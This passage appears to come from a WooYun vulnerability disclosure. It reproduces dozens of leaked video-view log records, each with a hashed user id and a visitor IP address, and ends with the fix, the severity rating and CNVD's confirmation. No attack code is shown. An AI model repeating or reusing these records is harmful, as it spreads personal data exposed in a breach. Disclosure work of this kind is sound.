{"uid":"35905cdf8507d294a76253053e4ac639","mid":"274735","vid":"","type":"videoview","ctime":"1407547279","ip":"112.192.54.190"}
{"uid":"6ce0883d5ee23136c705098966fb7219","mid":"364916","vid":"","type":"videoview","ctime":"1407547282","ip":"112.194.17.94"}
{"uid":"d34b8a42017a061cc7a57ef9d660cf12","mid":"368529","vid":"","type":"videoview","ctime":"1307116998","ip":"119.7.3.120"}
{"uid":"217a3aa58eaba4b98055cea0d242a785","mid":"39935","vid":"","type":"videoview","ctime":"1407547437","ip":"27.14.2.92"}
{"uid":"4fddb6269fb3cb3d6d574b4856f54eae","mid":"367156","vid":"","type":"videoview","ctime":"1407547667","ip":"221.10.141.46"}
{"uid":"fa15bf6e0241fee04bb60ecfc7d2192c","mid":"367151","vid":"","type":"videoview","ctime":"1407547682","ip":"27.14.176.253"}
{"uid":"217a3aa58eaba4b98055cea0d242a785","mid":"366148","vid":"","type":"videoview","ctime":"1407547708","ip":"27.14.2.92"}
{"uid":"4fddb6269fb3cb3d6d574b4856f54eae","mid":"365802","vid":"","type":"videoview","ctime":"1407547728","ip":"221.10.141.46"}
{"uid":"c1ed78d63c8db11b47d45bd9dc432060","mid":"363921","vid":"","type":"videoview","ctime":"1407547823","ip":"113.205.220.18"}
{"uid":"113884c1537984eaad0e2f4db50aabd5","mid":"368247","vid":"","type":"videoview","ctime":"1407547846","ip":"124.161.12.94"}
{"uid":"e1f510cb2e4f0c6cdbcb09472e17a9f4","mid":"363921","vid":"","type":"videoview","ctime":"1407548067","ip":"27.11.15.145"}
{"uid":"f8b8cd5454dacf050a4d96f53f24b872","mid":"368529","vid":"","type":"videoview","ctime":"1407547985","ip":"123.145.131.239"}
{"uid":"1abcf80f77d5cba19d244f3bb3437d62","mid":"367670","vid":"","type":"videoview","ctime":"1407548048","ip":"175.155.144.5"}
{"uid":"7d320d4b0a21e15cd52f603ee4906223","mid":"369772","vid":"","type":"videoview","ctime":"1407548098","ip":"112.195.229.40"}
{"uid":"76d303e1b37f2089d110f1318f58f836","mid":"365226","vid":"","type":"videoview","ctime":"1407548019","ip":"27.13.110.118"}
{"uid":"ede6d79769a334338f5cf3562f2504c7","mid":"368463","vid":"","type":"videoview","ctime":"1407548349","ip":"27.12.49.167"}
{"uid":"6380d5453230a0dd5922c5a8ce48d3e2","mid":"94764","vid":"","type":"videoview","ctime":"1407548391","ip":"27.14.133.27"}
{"uid":"7727f39a7d12e6ee99f10dbee6c06cad","mid":"363986","vid":"","type":"videoview","ctime":"1407548388","ip":"123.144.74.226"}
{"uid":"5cbbb2921ebddaee2fa5853d6d96ceb6","mid":"355384","vid":"","type":"videoview","ctime":"1407548770","ip":"113.206.251.25"}
{"uid":"5cbbb2921ebddaee2fa5853d6d96ceb6","mid":"181677","vid":"","type":"videoview","ctime":"1407548797","ip":"113.206.251.25"}
{"uid":"5cbbb2921ebddaee2fa5853d6d96ceb6","mid":"101057","vid":"","type":"videoview","ctime":"1407548827","ip":"113.206.251.25"}
{"uid":"5cbbb2921ebddaee2fa5853d6d96ceb6","mid":"105330","vid":"","type":"videoview","ctime":"1407548872","ip":"113.206.251.25"}
{"uid":"4541a0dba17f755b59c247cefe1ab3ad","mid":"367214","vid":"","type":"videoview","ctime":"1407548883","ip":"112.192.25.125"}
{"uid":"5e3bc4e32d55c4933aa9dd51ced68542","mid":"2465","vid":"","type":"videoview","ctime":"1407548908","ip":"27.12.139.126"}
{"uid":"0dbffb21f975dd79c8f02bd433a90bcd","mid":"94764","vid":"","type":"videoview","ctime":"1407548951","ip":"27.14.133.27"}
{"uid":"a9dad5e3e033f07916227984518eca39","mid":"35211","vid":"","type":"videoview","ctime":"1407549237","ip":"112.195.40.249"}
{"uid":"e5a80b083b39c4ed25733db650e651cb","mid":"367852","vid":"","type":"videoview","ctime":"1407549319","ip":"112.194.245.92"}
{"uid":"5d0c6af64e307c85e95e6db92bb8417c","mid":"369478","vid":"","type":"videoview","ctime":"1407549554","ip":"27.8.152.19"}
{"uid":"f384c3e3a64fe151d1da89e9b21131c7","mid":"274735","vid":"","type":"videoview","ctime":"1407549829","ip":"112.193.168.7"}
{"uid":"7de947ac605c016a8e535f6fe4fda351","mid":"369966","vid":"","type":"videoview","ctime":"1407549864","ip":"113.206.44.140"}
{"uid":"f384c3e3a64fe151d1da89e9b21131c7","mid":"369966","vid":"","type":"videoview","ctime":"1407549872","ip":"112.193.168.7"}
{"uid":"992018410cdee7c1296f3a03fb00b7e3","mid":"366488","vid":"","type":"videoview","ctime":"1407549931","ip":"113.206.142.124"}
{"uid":"992018410cdee7c1296f3a03fb00b7e3","mid":"366488","vid":"","type":"videoview","ctime":"1407549953","ip":"113.206.142.124"}
{"uid":"ab99b4cedee44b03b5a4ff3e906edc83","mid":"366488","vid":"","type":"videoview","ctime":"1407549936","ip":"27.10.28.228"}
{"uid":"015f5fcc609e9ead93f4a5f40f0e3bd0","mid":"366488","vid":"","type":"videoview","ctime":"1407550014","ip":"123.147.94.164"}
{"uid":"ab99b4cedee44b03b5a4ff3e906edc83","mid":"364973","vid":"","type":"videoview","ctime":"1407549976","ip":"27.10.28.228"}
{"uid":"244b9887409e119fbcffee0bafcf00e6","mid":"368766","vid":"","type":"videoview","ctime":"1407550086","ip":"119.5.18.241"}
{"uid":"ab99b4cedee44b03b5a4ff3e906edc83","mid":"364973","vid":"","type":"videoview","ctime":"1407550070","ip":"27.10.28.228"}
{"uid":"e8579794d7fdf4f511905f7226da1012","mid":"368766","vid":"","type":"videoview","ctime":"1407550235","ip":"119.5.71.252"}
{"uid":"7e93527f1d7a939f850f160010a2b976","mid":"357559","vid":"","type":"videoview","ctime":"1407550258","ip":"27.13.94.84"}
{"uid":"4fddb6269fb3cb3d6d574b4856f54eae","mid":"365802","vid":"","type":"videoview","ctime":"1407550352","ip":"221.10.141.46"}
{"uid":"8916bd3f96920af9ad1de29d99938c61","mid":"369772","vid":"","type":"videoview","ctime":"1407550402","ip":"119.7.31.56"}
{"uid":"5e3bc4e32d55c4933aa9dd51ced68542","mid":"77858","vid":"","type":"videoview","ctime":"1407550505","ip":"27.12.139.126"}
{"uid":"ae7ac4e65b8699231f59fe09204a3f51","mid":"368529","vid":"","type":"videoview","ctime":"1407550513","ip":"113.206.56.132"}
{"uid":"c30dcba067d785e6079767a929b44dc6","mid":"368497","vid":"","type":"videoview","ctime":"1407550574","ip":"27.10.52.40"}
{"uid":"5e3bc4e32d55c4933aa9dd51ced68542","mid":"2474","vid":"","type":"videoview","ctime":"1407550636","ip":"27.12.139.126"}
{"uid":"424afe0dde52778e264ca5b0dab6ca1b","mid":"367451","vid":"","type":"videoview","ctime":"1407550672","ip":"221.10.64.129"}
{"uid":"a25c240888d0a9e87da748dce0bd265b","mid":"2027","vid":"","type":"videoview","ctime":"1407550553","ip":"112.195.46.59"}
{"uid":"a25c240888d0a9e87da748dce0bd265b","mid":"366222","vid":"","type":"videoview","ctime":"1407550598","ip":"112.195.46.59"}
{"uid":"ad4eb1d7585aea08596de2a1f3e17edf","mid":"124063","vid":"","type":"videoview","ctime":"1407551075","ip":"27.14.139.118"}
{"uid":"a25c240888d0a9e87da748dce0bd265b","mid":"2027","vid":"","type":"videoview","ctime":"1407550818","ip":"112.195.46.59"}
{"uid":"56e5ce0843a4c3bf772d2a3b7cdde776","mid":"369850","vid":"","type":"videoview","ctime":"1406537826","ip":"175.152.12.225"}
{"uid":"56e5ce0843a4c3bf772d2a3b7cdde776","mid":"361660","vid":"","type":"videoview","ctime":"1406537839","ip":"175.152.12.225"}
{"uid":"aaf6abb51b31dabf96242de498084033","mid":"353170","vid":"","type":"videoview","ctime":"1407551109","ip":"27.8.51.232"}
{"uid":"7df49c4dd1bab340a3f3f3a60e9f80b4","mid":"368385","vid":"","type":"videoview","ctime":"1407551117","ip":"113.205.106.132"}
{"uid":"9cf92970dbe82542f99acb1416eb284f","mid":"97982","vid":"","type":"videoview","ctime":"1407551252","ip":"112.193.152.14"}
{"uid":"9cf92970dbe82542f99acb1416eb284f","mid":"367670","vid":"","type":"videoview","ctime":"1407551589","ip":"112.193.152.14"}
{"uid":"aaf6abb51b31dabf96242de498084033","mid":"366488","vid":"","type":"videoview","ctime":"1407551641","ip":"27.8.51.232"}
{"uid":"2205fe445f69c2409c8aa3d2822f5f13","mid":"367670","vid":"","type":"videoview","ctime":"1407551753","ip":"27.10.237.194"}
{"uid":"2205fe445f69c2409c8aa3d2822f5f13","mid":"369850","vid":"","type":"videoview","ctime":"1407551784","ip":"27.10.237.194"}
{"uid":"ecd0e941d4369c5c92bb27efb6a25ce3","mid":"97982","vid":"","type":"videoview","ctime":"1407551765","ip":"175.154.238.216"}
{"uid":"27cbab32718ede6356febad6205e6c39","mid":"369496","vid":"","type":"videoview","ctime":"1407551889","ip":"183.228.187.185"}
{"uid":"a335c63bebe704a9fc7fe2f0aa445a6e","mid":"77872","vid":"","type":"videoview","ctime":"1407551898","ip":"119.7.57.59"}

修复方案:

升级框架

版权声明:转载请注明来源 scanf@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-14 09:07

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给重庆分中心,由重庆分中心后续协调网站管理单位处置。 按多个案例的通用软件漏洞评分,rank 20

最新状态:

暂无